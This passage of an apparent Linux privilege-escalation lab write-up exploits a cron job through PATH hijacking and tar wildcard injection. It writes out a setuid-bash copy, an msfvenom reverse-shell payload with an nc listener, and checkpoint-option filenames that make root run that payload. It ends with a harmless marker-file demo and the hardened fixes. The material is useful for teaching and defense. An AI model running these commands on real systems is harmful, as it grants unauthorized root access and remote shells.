Now we run nc -lnvp 4444 in a terminal on our machine and, after a little while, we catch the reverse shell.

PATH Environment Variable

In the crontab, note that the PATH variable starts with /home/user, which is our user's home directory. The cron job that runs overwrite.sh calls it by its bare name, so cron's shell walks PATH from left to right and finds a file called overwrite.sh in /home/user before it ever reaches the real one. So we create a script with that name in our home directory and cron runs it instead of the real overwrite.sh:

$ cd && touch overwrite.sh
$ echo '#!/bin/bash
cp /bin/bash /tmp/rootbash
chmod +xs /tmp/rootbash' > overwrite.sh
$ chmod +x /home/user/overwrite.sh
$ # wait a little while for the cron job to run
$ /tmp/rootbash -p

The -p flag matters: without it, bash drops the effective UID it gets from the setuid bit and we would just get a normal user shell out of the root-owned copy. Check with id that the euid is 0.

Wildcards

The other script in the crontab has this content:

#!/bin/sh
cd /home/user
tar czf /tmp/backup.tar.gz *

Note that the tar command is run with a wildcard (*) in our home directory. tar itself never sees the *: the shell expands it to the list of names in /home/user, and any name that happens to look like an option is passed to tar as exactly that.

Take a look at the GTFOBins page for tar. tar has command line options that let you run other commands as part of its checkpoint feature. On the GTFOBins page we see:

sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh

We create a payload with msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4444 -f elf -o shell.elf, upload it to the target machine and make it executable with chmod +x /home/user/shell.elf.

Now, inspired by the GTFOBins command, we create these two files (the absolute path keeps touch from reading the leading -- as one of its own options):

$ touch /home/user/--checkpoint=1
$ touch /home/user/--checkpoint-action=exec=shell.elf

When the tar command in the cron job runs, the wildcard (*) expands to include these files. Since their filenames are valid tar command line options, tar treats them as options rather than as filenames: --checkpoint=1 makes tar run the checkpoint action after every record written, so it fires even for a tiny backup, and --checkpoint-action=exec=shell.elf runs our payload with the cron job's privileges (root here). Two details make this work: a filename cannot contain a /, so shell.elf has to be a bare name, and GNU tar hands that command to /bin/sh -c, which resolves it through PATH; the crontab's PATH starts with /home/user, so it is found.

Then we run nc -lnvp 4444 again and wait for the reverse shell to arrive on our machine.
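To see both mechanics without a root cron job or a reverse shell, here is an added shell example that is not part of the original writeup. It replays the crontab's PATH line and the backup script in a throwaway directory as an unprivileged user, with marker files standing in for the setuid bash and shell.elf, and puts the hardened forms (absolute script path, ./* instead of *) beside the vulnerable ones. The directory layout, the realbin directory and the payload.sh name are assumptions for the demo, and the wildcard half needs GNU tar.

```shell
#!/bin/sh
# Added example, not code from the original writeup: reproduces the PATH
# hijack and the tar wildcard injection in a temporary directory as an
# unprivileged user. The "payloads" only drop marker files, so the effect
# can be checked without root. Paths and names below are assumptions.
set -eu

WORK=$(mktemp -d)            # stands in for /home/user
REALBIN="$WORK/realbin"      # where the legitimate overwrite.sh is assumed to live
ARCHIVE=$(mktemp)            # stands in for /tmp/backup.tar.gz (kept outside $WORK)
trap 'rm -rf "$WORK" "$ARCHIVE"' EXIT

# The crontab's PATH line, with $WORK in the role of /home/user and the
# directory of the legitimate script last.
CRON_PATH="$WORK:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$REALBIN"

# -- PATH hijack ------------------------------------------------------------
mkdir -p "$REALBIN"
printf '#!/bin/sh\necho real > "%s/which_ran"\n' "$WORK" > "$REALBIN/overwrite.sh"
printf '#!/bin/sh\necho hijacked > "%s/which_ran"\n' "$WORK" > "$WORK/overwrite.sh"
chmod +x "$REALBIN/overwrite.sh" "$WORK/overwrite.sh"

# Cron runs the bare name, so sh walks PATH and finds our copy first.
path_hijack_result() {
    env PATH="$CRON_PATH" sh -c 'overwrite.sh'
    cat "$WORK/which_ran"        # hijacked
}

# Fix: call the script by absolute path (or keep only trusted dirs in PATH).
path_fixed_result() {
    env PATH="$CRON_PATH" sh -c "$REALBIN/overwrite.sh"
    cat "$WORK/which_ran"        # real
}

# -- tar wildcard injection -------------------------------------------------
# payload.sh stands in for shell.elf; it just leaves a marker file.
printf '#!/bin/sh\ntouch "%s/marker"\n' "$WORK" > "$WORK/payload.sh"
chmod +x "$WORK/payload.sh"
: > "$WORK/data.txt"
# Filenames that the shell's * expansion turns into tar options. Absolute
# paths keep the shell redirection from caring about the leading "--".
: > "$WORK/--checkpoint=1"
: > "$WORK/--checkpoint-action=exec=payload.sh"

run_backup() {
    # $1 is the wildcard form the cron script uses. PATH matters: GNU tar
    # runs the checkpoint command through /bin/sh -c, so the bare name
    # payload.sh is resolved via PATH, which here starts with $WORK.
    rm -f "$WORK/marker"
    ( cd "$WORK" && env PATH="$CRON_PATH" sh -c "tar czf '$ARCHIVE' $1" )
    [ -e "$WORK/marker" ] && echo executed || echo safe
}

wildcard_result()          { run_backup '*'; }    # executed
wildcard_hardened_result() { run_backup './*'; }  # safe: ./--checkpoint=1 is a filename
```

Running the two wildcard functions back to back shows the whole difference is the spelling of the glob: with * the names become options and the checkpoint action fires on the first record; with ./* (or -- before the glob) tar archives a file literally named ./--checkpoint=1 and nothing is executed.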